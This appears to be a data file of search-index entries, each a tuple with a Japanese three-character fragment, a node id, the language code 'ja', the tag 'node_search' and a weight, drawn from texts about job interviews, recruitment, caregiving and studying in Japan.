('心より', 192, 'ja', 'node_search', 0.860547),
('心より', 193, 'ja', 'node_search', 0.879565),
('心より', 194, 'ja', 'node_search', 0.800068),
('心より', 195, 'ja', 'node_search', 0.902857),
('心より', 196, 'ja', 'node_search', 0.886095),
('心より', 197, 'ja', 'node_search', 0.822065),
('心より', 198, 'ja', 'node_search', 0.860547),
('心より', 199, 'ja', 'node_search', 0.860547),
('心を持', 87, 'ja', 'node_search', 1),
('心者で', 62, 'ja', 'node_search', 4),
('心配す', 98, 'ja', 'node_search', 1),
('必要が', 3, 'ja', 'node_search', 2.24098),
('必要が', 5, 'ja', 'node_search', 0.949597),
('必要が', 18, 'ja', 'node_search', 1.9496),
('必要が', 142, 'ja', 'node_search', 0.805455),
('必要で', 3, 'ja', 'node_search', 0.879565),
('必要で', 30, 'ja', 'node_search', 5.52703),
('必要と', 5, 'ja', 'node_search', 3),
('必要と', 24, 'ja', 'node_search', 0.439448),
('必要と', 155, 'ja', 'node_search', 1),
('必要な', 5, 'ja', 'node_search', 1),
('必要な', 6, 'ja', 'node_search', 3),
('必要な', 24, 'ja', 'node_search', 0.549707),
('必要は', 3, 'ja', 'node_search', 0.848323),
('必要は', 5, 'ja', 'node_search', 0.902857),
('必要は', 98, 'ja', 'node_search', 1),
('必要も', 135, 'ja', 'node_search', 1),
('必須の', 140, 'ja', 'node_search', 0.920273),
('必須の', 142, 'ja', 'node_search', 0.718502),
('志と努', 186, 'ja', 'node_search', 1),
('志の成', 192, 'ja', 'node_search', 1),
('応じて', 24, 'ja', 'node_search', 0.542319),
('応募を', 133, 'ja', 'node_search', 0.71),
('応募条', 162, 'ja', 'node_search', 2.78241),
('応募条', 163, 'ja', 'node_search', 2.96276),
('応募者', 135, 'ja', 'node_search', 0.742984),
('念建築', 27, 'ja', 'node_search', 0.542319),
('思いま', 69, 'ja', 'node_search', 1),
('思いや', 162, 'ja', 'node_search', 0.672252),
('思いや', 189, 'ja', 'node_search', 1),
('思うよ', 87, 'ja', 'node_search', 0.594307),
('思って', 1, 'ja', 'node_search', 1),
('思議で', 3, 'ja', 'node_search', 0.738408),
('急で募', 10, 'ja', 'node_search', 3),
('急で求', 18, 'ja', 'node_search', 3),
('急に求', 30, 'ja', 'node_search', 3),
('性があ', 8, 'ja', 'node_search', 2),
('性であ', 18, 'ja', 'node_search', 1),
('性と将', 197, 'ja', 'node_search', 1),
('性のあ', 138, 'ja', 'node_search', 0.695602),
('性のみ', 30, 'ja', 'node_search', 1.89608),
('性の世', 62, 'ja', 'node_search', 0.499853),
('性への', 191, 'ja', 'node_search', 0.927431),
('性を信', 120, 'ja', 'node_search', 1),
('性を広', 183, 'ja', 'node_search', 0.923838),
('性を広', 196, 'ja', 'node_search', 0.98493),
('性を理', 122, 'ja', 'node_search', 2),
('恵まれ', 174, 'ja', 'node_search', 0.808176),
('恵外食', 73, 'ja', 'node_search', 1),
('想定月', 162, 'ja', 'node_search', 0.725015),
('意と準', 199, 'ja', 'node_search', 0.989021),
('意と規', 122, 'ja', 'node_search', 1),
('意の成', 166, 'ja', 'node_search', 1),
('意の成', 179, 'ja', 'node_search', 1),
('意の成', 198, 'ja', 'node_search', 1),
('意の表', 188, 'ja', 'node_search', 1),
('意志と', 186, 'ja', 'node_search', 1),
('意志と', 189, 'ja', 'node_search', 1),
('意志の', 192, 'ja', 'node_search', 1),
('意欲が', 3, 'ja', 'node_search', 0.889397),
('意欲と', 195, 'ja', 'node_search', 1),
('愛知県', 162, 'ja', 'node_search', 28.8082),
('感があ', 162, 'ja', 'node_search', 0.676032),
('感じら', 120, 'ja', 'node_search', 0.942091),
('感謝し', 69, 'ja', 'node_search', 1),
('感謝申', 133, 'ja', 'node_search', 0.800068),
('慈善事', 27, 'ja', 'node_search', 0.526987),
('慎重に', 87, 'ja', 'node_search', 0.718502),
('慣をつ', 87, 'ja', 'node_search', 0.797402),
('懸命に', 77, 'ja', 'node_search', 1),
('懸命働', 87, 'ja', 'node_search', 2.2473),
('懸命勉', 98, 'ja', 'node_search', 1),
('成され', 181, 'ja', 'node_search', 1),
('成され', 182, 'ja', 'node_search', 1),
('成され', 183, 'ja', 'node_search', 1),
('成され', 190, 'ja', 'node_search', 1),
('成と日', 161, 'ja', 'node_search', 0.842342),
('成に向', 62, 'ja', 'node_search', 0.483934),
('成に向', 185, 'ja', 'node_search', 1),
('成の旅', 1, 'ja', 'node_search', 0.993146),
('成を希', 162, 'ja', 'node_search', 0.689612),
('成を目', 162, 'ja', 'node_search', 1),
('成サー', 24, 'ja', 'node_search', 0.857458),
('成功し', 23, 'ja', 'node_search', 0.655756),
('成功し', 80, 'ja', 'node_search', 1),
('成功し', 133, 'ja', 'node_search', 0.736141),
('成功と', 113, 'ja', 'node_search', 1),
('成功と', 174, 'ja', 'node_search', 0.839384),
('成功に', 197, 'ja', 'node_search', 1),
('成功の', 136, 'ja', 'node_search', 0.683725),
('成功の', 140, 'ja', 'node_search', 1),
('成功を', 140, 'ja', 'node_search', 0.792123),
('成功を', 161, 'ja', 'node_search', 0.766757),
('成功を', 169, 'ja', 'node_search', 0.916736),
('成功を', 180, 'ja', 'node_search', 0.816452),
('成功を', 186, 'ja', 'node_search', 0.784336),
('成功を', 196, 'ja', 'node_search', 0.813674),
('成果が', 168, 'ja', 'node_search', 0.848323),
('成果が', 170, 'ja', 'node_search', 0.857458),
('成果で', 160, 'ja', 'node_search', 1),
('成果で', 161, 'ja', 'node_search', 1),
('成果で', 166, 'ja', 'node_search', 1),
('成果で', 168, 'ja', 'node_search', 1),
('成果で', 170, 'ja', 'node_search', 1),
('成果で', 179, 'ja', 'node_search', 1),
('成果で', 180, 'ja', 'node_search', 1),
('成果で', 181, 'ja', 'node_search', 0.972861),
('成果で', 186, 'ja', 'node_search', 1),
('成果で', 188, 'ja', 'node_search', 1),
('成果で', 189, 'ja', 'node_search', 1),
('成果で', 190, 'ja', 'node_search', 1),
('成果で', 192, 'ja', 'node_search', 1),
('成果で', 193, 'ja', 'node_search', 1),
('成果で', 195, 'ja', 'node_search', 1),
('成果で', 196, 'ja', 'node_search', 1),
('成果で', 197, 'ja', 'node_search', 1),
('成果で', 198, 'ja', 'node_search', 1),
('成果で', 199, 'ja', 'node_search', 1),
('成果と', 165, 'ja', 'node_search', 0.957226),
('成果と', 182, 'ja', 'node_search', 4),
('成果に', 178, 'ja', 'node_search', 0.98493),
('成果の', 182, 'ja', 'node_search', 27),
('成果は', 191, 'ja', 'node_search', 1),
('成果は', 199, 'ja', 'node_search', 1),
('成果を', 62, 'ja', 'node_search', 0.674137),
('成果を', 140, 'ja', 'node_search', 1),
('成果を', 160, 'ja', 'node_search', 0.945829),
('成果を', 166, 'ja', 'node_search', 0.989021),
('成果を', 176, 'ja', 'node_search', 1),
('成果を', 181, 'ja', 'node_search', 1),
('成果を', 182, 'ja', 'node_search', 1),
('成果を', 183, 'ja', 'node_search', 1),
('成果を', 195, 'ja', 'node_search', 0.913226),
('成果を', 198, 'ja', 'node_search', 0.869951),
('成績で', 81, 'ja', 'node_search', 1),
('成長が', 198, 'ja', 'node_search', 0.916736),
('成長さ', 173, 'ja', 'node_search', 0.869951),
('成長さ', 175, 'ja', 'node_search', 0.902857),
('成長さ', 176, 'ja', 'node_search', 0.931053),
('成長さ', 177, 'ja', 'node_search', 0.819249),
('成長さ', 184, 'ja', 'node_search', 0.830633),
('成長さ', 197, 'ja', 'node_search', 0.842342),
('成長し', 195, 'ja', 'node_search', 0.997306),
('成長と', 169, 'ja', 'node_search', 0.927431),
('成長と', 174, 'ja', 'node_search', 0.972861),
('成長と', 181, 'ja', 'node_search', 0.830633),
('成長と', 192, 'ja', 'node_search', 0.909743),
('成長と', 199, 'ja', 'node_search', 0.892724),
('成長に', 164, 'ja', 'node_search', 0.851346),
('成長に', 193, 'ja', 'node_search', 0.927431),
('成長の', 62, 'ja', 'node_search', 0.538701),
('成長の', 185, 'ja', 'node_search', 0.934703),
('成長の', 187, 'ja', 'node_search', 0.913226),
('成長の', 194, 'ja', 'node_search', 0.833529),
('成長を', 171, 'ja', 'node_search', 0.805455),
('戦が実', 178, 'ja', 'node_search', 0.899454),
('戦が実', 185, 'ja', 'node_search', 0.792123),
('戦が実', 187, 'ja', 'node_search', 0.819249),
('戦が素', 199, 'ja', 'node_search', 0.802752),
('戦とご', 188, 'ja', 'node_search', 0.784336),
('戦の成', 196, 'ja', 'node_search', 1),
('戦の機', 174, 'ja', 'node_search', 0.957226),
('戦を心', 165, 'ja', 'node_search', 0.913226),
('戦を続', 183, 'ja', 'node_search', 0.830633),
('戸建て', 163, 'ja', 'node_search', 0.76431),
('戻るケ', 3, 'ja', 'node_search', 0.566439),
('房にお', 122, 'ja', 'node_search', 1),
('房業務', 133, 'ja', 'node_search', 1),
('所から', 9, 'ja', 'node_search', 3),
('所から', 17, 'ja', 'node_search', 4),
('所で働', 23, 'ja', 'node_search', 0.604732),
('所で溶', 8, 'ja', 'node_search', 27),
('所で雇', 6, 'ja', 'node_search', 28),
('所で電', 10, 'ja', 'node_search', 28),
('所得税', 8, 'ja', 'node_search', 2),
('扉が開', 187, 'ja', 'node_search', 0.968904),
('扉を開', 62, 'ja', 'node_search', 0.479169),
('手にさ', 194, 'ja', 'node_search', 1),
('手に入', 3, 'ja', 'node_search', 1),
('手に話', 18, 'ja', 'node_search', 0.934703),
('手を取', 62, 'ja', 'node_search', 1),
('手伝い', 1, 'ja', 'node_search', 1),
('手伝い', 62, 'ja', 'node_search', 4),
('手当は', 5, 'ja', 'node_search', 1),
('手掛け', 27, 'ja', 'node_search', 0.519091),
('手段と', 5, 'ja', 'node_search', 0.863659),
('手続き', 160, 'ja', 'node_search', 0.879565),
('手続き', 161, 'ja', 'node_search', 0.931053),
('手続き', 166, 'ja', 'node_search', 0.916736),
('手続き', 168, 'ja', 'node_search', 0.920273),
('手続き', 170, 'ja', 'node_search', 0.931053),
('手続き', 178, 'ja', 'node_search', 0.949597),
('手続き', 179, 'ja', 'node_search', 0.769219),
('手続き', 184, 'ja', 'node_search', 1),
('手続き', 186, 'ja', 'node_search', 0.913226),
('手続き', 187, 'ja', 'node_search', 0.863659),
('手続き', 190, 'ja', 'node_search', 0.906287),
('手続き', 191, 'ja', 'node_search', 0.848323),
('手続き', 193, 'ja', 'node_search', 0.830633),
('手続き', 194, 'ja', 'node_search', 0.882818),
('手続き', 195, 'ja', 'node_search', 0.860547),
('手続き', 198, 'ja', 'node_search', 0.816452),
('手配を', 136, 'ja', 'node_search', 0.664818),
('手頃な', 27, 'ja', 'node_search', 0.997113),
('手順を', 133, 'ja', 'node_search', 1),
('払う必', 5, 'ja', 'node_search', 0.909743),
('扱った', 133, 'ja', 'node_search', 0.98493),
('技クラ', 138, 'ja', 'node_search', 1),
('技能な', 24, 'ja', 'node_search', 0.827757),
('技能ビ', 62, 'ja', 'node_search', 0.716357),
('技能人', 155, 'ja', 'node_search', 0.842342),
('技能対', 155, 'ja', 'node_search', 5),
('技能試', 155, 'ja', 'node_search', 28.7571),
('技術だ', 190, 'ja', 'node_search', 1),
('技術を', 3, 'ja', 'node_search', 0.923838),
('技術を', 23, 'ja', 'node_search', 0.483934),
('技術を', 193, 'ja', 'node_search', 0.961087),
('技術を', 195, 'ja', 'node_search', 1),
('技術分', 7, 'ja', 'node_search', 1.8861),
('技術的', 122, 'ja', 'node_search', 1),
('技術者', 3, 'ja', 'node_search', 0.7017),
('技術者', 7, 'ja', 'node_search', 5.58046),
('技術者', 8, 'ja', 'node_search', 29),
('技術者', 19, 'ja', 'node_search', 28),
('投資す', 3, 'ja', 'node_search', 1),
('抱きし', 62, 'ja', 'node_search', 0.53161),
('担当者', 29, 'ja', 'node_search', 28),
('拠点に', 27, 'ja', 'node_search', 0.927431),
('拡張す', 62, 'ja', 'node_search', 0.822065),
('括的な', 62, 'ja', 'node_search', 0.892724),
('括的な', 136, 'ja', 'node_search', 1),
('持たれ', 24, 'ja', 'node_search', 0.638366),
('持ちが', 189, 'ja', 'node_search', 0.993146),
('持ちの', 163, 'ja', 'node_search', 0.674137),
('持って', 3, 'ja', 'node_search', 1),
('持って', 5, 'ja', 'node_search', 28),
('持って', 6, 'ja', 'node_search', 28),
('持って', 24, 'ja', 'node_search', 0.420557),
('持って', 162, 'ja', 'node_search', 0.662985),
('持つ労', 7, 'ja', 'node_search', 1.80283),
('持つ方', 7, 'ja', 'node_search', 3.8861),
('持つ講', 133, 'ja', 'node_search', 1),
('持者が', 3, 'ja', 'node_search', 0.571798),
('持者の', 3, 'ja', 'node_search', 0.635),
('持者を', 162, 'ja', 'node_search', 1),
('指して', 26, 'ja', 'node_search', 1),
('指して', 135, 'ja', 'node_search', 0.683725),
('指す介', 162, 'ja', 'node_search', 1),
('指す方', 155, 'ja', 'node_search', 1.74529),
('指導し', 133, 'ja', 'node_search', 1),
('指導す', 133, 'ja', 'node_search', 1),
('指導に', 136, 'ja', 'node_search', 1.72291),
('指導の', 116, 'ja', 'node_search', 1),
('指導の', 120, 'ja', 'node_search', 1),
('指導を', 138, 'ja', 'node_search', 1),
('指導を', 142, 'ja', 'node_search', 0.727213),
('指導者', 23, 'ja', 'node_search', 0.570448),
('挑戦が', 178, 'ja', 'node_search', 0.902857),
('挑戦が', 185, 'ja', 'node_search', 0.794753),
('挑戦が', 187, 'ja', 'node_search', 0.822065),
('挑戦が', 199, 'ja', 'node_search', 0.805455),
('挑戦と', 188, 'ja', 'node_search', 0.786915),
('挑戦の', 174, 'ja', 'node_search', 0.961087),
('挑戦の', 196, 'ja', 'node_search', 1),
('挑戦へ', 169, 'ja', 'node_search', 4),
('挑戦を', 165, 'ja', 'node_search', 0.916736),
('挑戦を', 183, 'ja', 'node_search', 0.833529),
('振る舞', 87, 'ja', 'node_search', 0.882818),
('授与さ', 62, 'ja', 'node_search', 0.653974),
('授業で', 24, 'ja', 'node_search', 0.403922),
('授業の', 24, 'ja', 'node_search', 0.757065),
('授業の', 98, 'ja', 'node_search', 1),
('授業は', 142, 'ja', 'node_search', 1),
('授業を', 24, 'ja', 'node_search', 0.356021),
('授業日', 155, 'ja', 'node_search', 0.913226),
('授業時', 155, 'ja', 'node_search', 0.902857),
('排除し', 136, 'ja', 'node_search', 0.695602),
('掛けさ', 27, 'ja', 'node_search', 0.517983),
('採用さ', 156, 'ja', 'node_search', 1.94583),
('採用さ', 157, 'ja', 'node_search', 1.83645),
('採用面', 160, 'ja', 'node_search', 3.99047),
('採用面', 161, 'ja', 'node_search', 1.74996),
('採用面', 166, 'ja', 'node_search', 4.08679),
('採用面', 168, 'ja', 'node_search', 1.75946),
('採用面', 170, 'ja', 'node_search', 3.98118),
('採用面', 178, 'ja', 'node_search', 1.78178),
('採用面', 179, 'ja', 'node_search', 1.73165),
('採用面', 180, 'ja', 'node_search', 1.80007),
('採用面', 185, 'ja', 'node_search', 4.00925),
('採用面', 186, 'ja', 'node_search', 1.76922),
('採用面', 187, 'ja', 'node_search', 3.96276),
('採用面', 188, 'ja', 'node_search', 1.76188),
('採用面', 189, 'ja', 'node_search', 3.99983),
('採用面', 190, 'ja', 'node_search', 4.07688),
('採用面', 191, 'ja', 'node_search', 4.2327),
('採用面', 192, 'ja', 'node_search', 4.11692),
('採用面', 193, 'ja', 'node_search', 4.17901),
('採用面', 194, 'ja', 'node_search', 4.00925),
('採用面', 195, 'ja', 'node_search', 1.80545),
('採用面', 196, 'ja', 'node_search', 4.18961),
('採用面', 197, 'ja', 'node_search', 4.07688),
('採用面', 198, 'ja', 'node_search', 1.78178),
('採用面', 199, 'ja', 'node_search', 4.01872),
('接に優', 81, 'ja', 'node_search', 4),
('接に合', 70, 'ja', 'node_search', 1),
('接に合', 71, 'ja', 'node_search', 1),
('接に合', 72, 'ja', 'node_search', 1),
('接に合', 74, 'ja', 'node_search', 1),
('接に合', 75, 'ja', 'node_search', 1),
('接に合', 82, 'ja', 'node_search', 1),
('接に合', 84, 'ja', 'node_search', 1),
('接に合', 90, 'ja', 'node_search', 1),
('接に合', 98, 'ja', 'node_search', 1),
('接に合', 100, 'ja', 'node_search', 4),
('接に合', 107, 'ja', 'node_search', 1),
('接に合', 109, 'ja', 'node_search', 1),
('接に合', 112, 'ja', 'node_search', 1),
('接に合', 114, 'ja', 'node_search', 1),
('接に合', 115, 'ja', 'node_search', 1),
('接に合', 117, 'ja', 'node_search', 1),
('接に合', 131, 'ja', 'node_search', 1),
('接に合', 132, 'ja', 'node_search', 1),
('接に合', 133, 'ja', 'node_search', 0.781775),
('接に合', 134, 'ja', 'node_search', 1),
('接に合', 135, 'ja', 'node_search', 1),
('接に合', 136, 'ja', 'node_search', 2),
('接に合', 137, 'ja', 'node_search', 1),
('接に合', 139, 'ja', 'node_search', 1),
('接に合', 140, 'ja', 'node_search', 1),
('接に合', 141, 'ja', 'node_search', 1),
('接に合', 143, 'ja', 'node_search', 1),
('接に合', 144, 'ja', 'node_search', 1),
('接に合', 160, 'ja', 'node_search', 3.99047),
('接に合', 161, 'ja', 'node_search', 1.74996),
('接に合', 166, 'ja', 'node_search', 4.08679),
('接に合', 168, 'ja', 'node_search', 1.75946),
('接に合', 170, 'ja', 'node_search', 3.98118),
('接に合', 178, 'ja', 'node_search', 1.78178),
('接に合', 179, 'ja', 'node_search', 1.73165),
('接に合', 180, 'ja', 'node_search', 1.80007),
('接に合', 185, 'ja', 'node_search', 4.00925),
('接に合', 186, 'ja', 'node_search', 1.76922),
('接に合', 187, 'ja', 'node_search', 3.96276),
('接に合', 188, 'ja', 'node_search', 1.76188),
('接に合', 189, 'ja', 'node_search', 3.99983),
('接に合', 190, 'ja', 'node_search', 4.07688),
('接に合', 191, 'ja', 'node_search', 4.2327),
('接に合', 192, 'ja', 'node_search', 4.11692),
('接に合', 193, 'ja', 'node_search', 4.17901),
('接に合', 194, 'ja', 'node_search', 4.00925),
('接に合', 195, 'ja', 'node_search', 1.80545),
('接に合', 196, 'ja', 'node_search', 4.18961),
('接に合', 197, 'ja', 'node_search', 4.07688),
('接に合', 198, 'ja', 'node_search', 1.78178),
('接に合', 199, 'ja', 'node_search', 4.01872),
('接に向', 179, 'ja', 'node_search', 1),
('接の分', 3, 'ja', 'node_search', 0.657549),
('接の準', 138, 'ja', 'node_search', 1),
('接を受', 142, 'ja', 'node_search', 0.819249),
('接を通', 189, 'ja', 'node_search', 0.961087),
('接クラ', 3, 'ja', 'node_search', 43),
('接仕入', 27, 'ja', 'node_search', 0.319735),
('接合格', 85, 'ja', 'node_search', 4),
('接合格', 101, 'ja', 'node_search', 4),
('接合格', 102, 'ja', 'node_search', 1),
('接合格', 110, 'ja', 'node_search', 1),
('接合格', 120, 'ja', 'node_search', 19),
('接合格', 138, 'ja', 'node_search', 0.716357),
('接合格', 146, 'ja', 'node_search', 20),
('接合格', 160, 'ja', 'node_search', 27),
('接合格', 161, 'ja', 'node_search', 31),
('接合格', 166, 'ja', 'node_search', 31),
('接合格', 168, 'ja', 'node_search', 31),
('接合格', 170, 'ja', 'node_search', 31),
('接合格', 178, 'ja', 'node_search', 31),
('接合格', 179, 'ja', 'node_search', 31),
('接合格', 180, 'ja', 'node_search', 32),
('接合格', 185, 'ja', 'node_search', 31),
('接合格', 186, 'ja', 'node_search', 32),
('接合格', 187, 'ja', 'node_search', 31),
('接合格', 188, 'ja', 'node_search', 31),
('接合格', 189, 'ja', 'node_search', 31),
('接合格', 190, 'ja', 'node_search', 32),
('接合格', 191, 'ja', 'node_search', 32),
('接合格', 192, 'ja', 'node_search', 32),
('接合格', 193, 'ja', 'node_search', 31),
('接合格', 194, 'ja', 'node_search', 31),
('接合格', 195, 'ja', 'node_search', 31),
('接合格', 196, 'ja', 'node_search', 32),
('接合格', 197, 'ja', 'node_search', 31),
('接合格', 198, 'ja', 'node_search', 31),
('接合格', 199, 'ja', 'node_search', 31),
('接合格', 200, 'ja', 'node_search', 31),
('接対策', 155, 'ja', 'node_search', 1),
('接対策', 184, 'ja', 'node_search', 1),
('接成功', 197, 'ja', 'node_search', 1),
('接技術', 3, 'ja', 'node_search', 1.62913),
('接技術', 8, 'ja', 'node_search', 29),
('接技術', 19, 'ja', 'node_search', 28),
('接準備', 173, 'ja', 'node_search', 1),
('接研修', 9, 'ja', 'node_search', 3),
('接研修', 17, 'ja', 'node_search', 4),
('接試験', 6, 'ja', 'node_search', 3),
('接輸入', 23, 'ja', 'node_search', 0.851346),
('掴むサ', 24, 'ja', 'node_search', 0.495774),
('掴んで', 62, 'ja', 'node_search', 4),
('提供さ', 27, 'ja', 'node_search', 0.391679),
('提供し', 1, 'ja', 'node_search', 1),
('提供し', 23, 'ja', 'node_search', 0.986334),
('提供し', 24, 'ja', 'node_search', 0.726189),
('提供し', 27, 'ja', 'node_search', 0.481063),
('提供し', 62, 'ja', 'node_search', 0.691597),
('提供し', 136, 'ja', 'node_search', 1),
('提供し', 138, 'ja', 'node_search', 0.742984),
('提供す', 23, 'ja', 'node_search', 0.419836),
('提供す', 24, 'ja', 'node_search', 0.45757),
('提供す', 27, 'ja', 'node_search', 0.424938),
('提供す', 62, 'ja', 'node_search', 0.989021),
('提供す', 135, 'ja', 'node_search', 1.6916),
('提供す', 185, 'ja', 'node_search', 0.913226),
('提供を', 23, 'ja', 'node_search', 1),
('提携し', 62, 'ja', 'node_search', 0.771698),
('提携し', 142, 'ja', 'node_search', 0.873132),
('換えて', 87, 'ja', 'node_search', 0.670377),
('揮され', 189, 'ja', 'node_search', 0.906287),
('援して', 154, 'ja', 'node_search', 0.800068),
('援して', 164, 'ja', 'node_search', 0.76431),
('援して', 165, 'ja', 'node_search', 0.76188),
('援して', 167, 'ja', 'node_search', 0.830633),
('援して', 173, 'ja', 'node_search', 0.774192),
('援して', 174, 'ja', 'node_search', 0.733888),
('援して', 175, 'ja', 'node_search', 0.781775),
('援して', 176, 'ja', 'node_search', 0.752312),
('援しま', 142, 'ja', 'node_search', 0.63167),
('援に努', 161, 'ja', 'node_search', 0.824901),
('援を提', 23, 'ja', 'node_search', 0.438659),
('援を提', 62, 'ja', 'node_search', 0.693594),
('援を続', 23, 'ja', 'node_search', 0.469921),
('援を続', 160, 'ja', 'node_search', 0.766757),
('援を行', 179, 'ja', 'node_search', 0.824901),
('揺るぎ', 120, 'ja', 'node_search', 1),
('損失が', 26, 'ja', 'node_search', 1),
('携して', 142, 'ja', 'node_search', 0.869951),
('携も行', 24, 'ja', 'node_search', 0.342226),
('支えた', 189, 'ja', 'node_search', 1),
('支えと', 154, 'ja', 'node_search', 0.938382),
('支える', 188, 'ja', 'node_search', 0.980874),
('支店で', 27, 'ja', 'node_search', 1),
('支払う', 5, 'ja', 'node_search', 0.913226),
('支援し', 142, 'ja', 'node_search', 0.63333),
('支援し', 154, 'ja', 'node_search', 0.802752),
('支援し', 164, 'ja', 'node_search', 0.766757),
('支援し', 165, 'ja', 'node_search', 0.76431),
('支援し', 167, 'ja', 'node_search', 0.833529),
('支援し', 173, 'ja', 'node_search', 0.776703),
('支援し', 174, 'ja', 'node_search', 0.736141),
('支援し', 175, 'ja', 'node_search', 0.784336),
('支援し', 176, 'ja', 'node_search', 0.754681),
('支援に', 161, 'ja', 'node_search', 0.827757),
('支援を', 23, 'ja', 'node_search', 0.909488),
('支援を', 62, 'ja', 'node_search', 0.695602),
('支援を', 160, 'ja', 'node_search', 0.769219),
('支援を', 179, 'ja', 'node_search', 0.827757),
('支給し', 18, 'ja', 'node_search', 1),
('政府お', 27, 'ja', 'node_search', 0.478227),
('政府か', 23, 'ja', 'node_search', 0.697623),
('政府機', 27, 'ja', 'node_search', 0.683725),
('政府部', 27, 'ja', 'node_search', 0.386142),
('政的な', 3, 'ja', 'node_search', 1),
('教えて', 28, 'ja', 'node_search', 1),
('教える', 24, 'ja', 'node_search', 0.429413),
('教室を', 28, 'ja', 'node_search', 3),
('教師に', 142, 'ja', 'node_search', 0.747619),
('教師の', 136, 'ja', 'node_search', 0.738408),
('教科書', 62, 'ja', 'node_search', 1.17359),
('教科書', 155, 'ja', 'node_search', 0.866793),
('教育と', 27, 'ja', 'node_search', 0.776703),
('教育を', 135, 'ja', 'node_search', 1),
('教育中', 27, 'ja', 'node_search', 0.359127),
('敬しま', 87, 'ja', 'node_search', 1),
('敬意と', 122, 'ja', 'node_search', 1),
('数制の', 138, 'ja', 'node_search', 0.76188),
('文化な', 24, 'ja', 'node_search', 0.769219),
('文化や', 122, 'ja', 'node_search', 1),
('文化を', 77, 'ja', 'node_search', 4),
('文化を', 87, 'ja', 'node_search', 1),
('文法を', 62, 'ja', 'node_search', 0.836446),
('料理の', 122, 'ja', 'node_search', 0.980874),
('料金を', 62, 'ja', 'node_search', 1.16896),
('新しい', 3, 'ja', 'node_search', 0.606252),
('新しい', 142, 'ja', 'node_search', 1),
('新しい', 154, 'ja', 'node_search', 1),
('新しい', 166, 'ja', 'node_search', 0.860547),
('新しい', 167, 'ja', 'node_search', 1),
('新しい', 169, 'ja', 'node_search', 0.980874),
('新しい', 171, 'ja', 'node_search', 0.920273),
('新しい', 174, 'ja', 'node_search', 0.938382),
('新しい', 175, 'ja', 'node_search', 0.989021),
('新しい', 177, 'ja', 'node_search', 0.916736),
('新しい', 187, 'ja', 'node_search', 0.830633),
('新しい', 199, 'ja', 'node_search', 0.813674),
('新たな', 126, 'ja', 'node_search', 1),
('新たな', 164, 'ja', 'node_search', 5),
('新たな', 165, 'ja', 'node_search', 0.927431),
('新たな', 167, 'ja', 'node_search', 1),
('新たな', 169, 'ja', 'node_search', 5),
('新たな', 171, 'ja', 'node_search', 1),
('新たな', 173, 'ja', 'node_search', 27.9769),
('新たな', 174, 'ja', 'node_search', 28),
('新たな', 175, 'ja', 'node_search', 28),
('新たな', 176, 'ja', 'node_search', 1),
('新たな', 177, 'ja', 'node_search', 28),
('新たな', 178, 'ja', 'node_search', 0.913226),
('新たな', 180, 'ja', 'node_search', 0.993146),
('新たな', 183, 'ja', 'node_search', 27),
('新たな', 184, 'ja', 'node_search', 0.931053),
('新たな', 185, 'ja', 'node_search', 0.802752),
('新たな', 186, 'ja', 'node_search', 1),
('新たな', 187, 'ja', 'node_search', 1),
('新たな', 188, 'ja', 'node_search', 0.794753),
('新たな', 189, 'ja', 'node_search', 0.810915),
('新たな', 191, 'ja', 'node_search', 0.945829),
('新たな', 196, 'ja', 'node_search', 0.945829),
('新たな', 197, 'ja', 'node_search', 1),
('新コメ', 142, 'ja', 'node_search', 19),
('新化さ', 27, 'ja', 'node_search', 0.571798),
('新年に', 140, 'ja', 'node_search', 1),
('新年は', 142, 'ja', 'node_search', 1),
('新潟大', 62, 'ja', 'node_search', 1),
('新総合', 62, 'ja', 'node_search', 1.66045),
('新規開', 155, 'ja', 'node_search', 5),
('新鮮な', 122, 'ja', 'node_search', 1),
('方でも', 62, 'ja', 'node_search', 4),
('方で多', 27, 'ja', 'node_search', 0.470829),
('方にお', 155, 'ja', 'node_search', 0.771698),
('方に対', 7, 'ja', 'node_search', 3.75712),
('方のた', 7, 'ja', 'node_search', 3.8861),
('方のた', 24, 'ja', 'node_search', 0.393562),
('方の指', 136, 'ja', 'node_search', 0.997306),
('方はお', 163, 'ja', 'node_search', 0.636679),
('方は優', 163, 'ja', 'node_search', 0.668514),
('方を対', 163, 'ja', 'node_search', 2),
('方域で', 27, 'ja', 'node_search', 0.657549),
('方法を', 28, 'ja', 'node_search', 1),
('施され', 27, 'ja', 'node_search', 0.462781),
('施設で', 136, 'ja', 'node_search', 0.784336),
('施設で', 155, 'ja', 'node_search', 1),
('施設勤', 162, 'ja', 'node_search', 1),
('旅に出', 80, 'ja', 'node_search', 1),
('旅に出', 140, 'ja', 'node_search', 1),
('旅をサ', 1, 'ja', 'node_search', 0.98493),
('旅をサ', 62, 'ja', 'node_search', 0.934703),
('旅を祈', 73, 'ja', 'node_search', 1),
('旅を通', 120, 'ja', 'node_search', 1),
('族の支', 154, 'ja', 'node_search', 0.945829),
('族の誇', 156, 'ja', 'node_search', 1),
('族の誇', 157, 'ja', 'node_search', 0.98493),
('族を問', 23, 'ja', 'node_search', 0.621888),
('族問わ', 24, 'ja', 'node_search', 1),
('日あた', 5, 'ja', 'node_search', 1),
('日から', 62, 'ja', 'node_search', 29),
('日から', 142, 'ja', 'node_search', 2),
('日につ', 29, 'ja', 'node_search', 3),
('日にト', 126, 'ja', 'node_search', 1),
('日に日', 78, 'ja', 'node_search', 1),
('日に日', 126, 'ja', 'node_search', 1),
('日に特', 164, 'ja', 'node_search', 1.75231),
('日に特', 169, 'ja', 'node_search', 1),
('日に特', 171, 'ja', 'node_search', 3.11692),
('日に特', 174, 'ja', 'node_search', 0.722831),
('日に特', 175, 'ja', 'node_search', 0.769219),
('日に特', 177, 'ja', 'node_search', 0.714225),
('日に特', 184, 'ja', 'node_search', 0.76188),
('日に設', 27, 'ja', 'node_search', 0.502958),
('日に食', 68, 'ja', 'node_search', 4),
('日の学', 142, 'ja', 'node_search', 0.691597),
('日まで', 142, 'ja', 'node_search', 1),
('日を送', 175, 'ja', 'node_search', 0.879565),
('日を送', 177, 'ja', 'node_search', 0.800068),
('日常会', 163, 'ja', 'node_search', 0.736141),
('日常生', 162, 'ja', 'node_search', 0.938382),
('日後ま', 179, 'ja', 'node_search', 0.851346),
('日曜日', 142, 'ja', 'node_search', 1),
('日本か', 23, 'ja', 'node_search', 0.866793),
('日本か', 27, 'ja', 'node_search', 0.30301),
('日本で', 69, 'ja', 'node_search', 1),
('日本で', 98, 'ja', 'node_search', 1),
('日本で', 111, 'ja', 'node_search', 1),
('日本で', 115, 'ja', 'node_search', 1),
('日本で', 121, 'ja', 'node_search', 1),
('日本で', 126, 'ja', 'node_search', 1),
('日本で', 133, 'ja', 'node_search', 1),
('日本で', 140, 'ja', 'node_search', 0.824901),
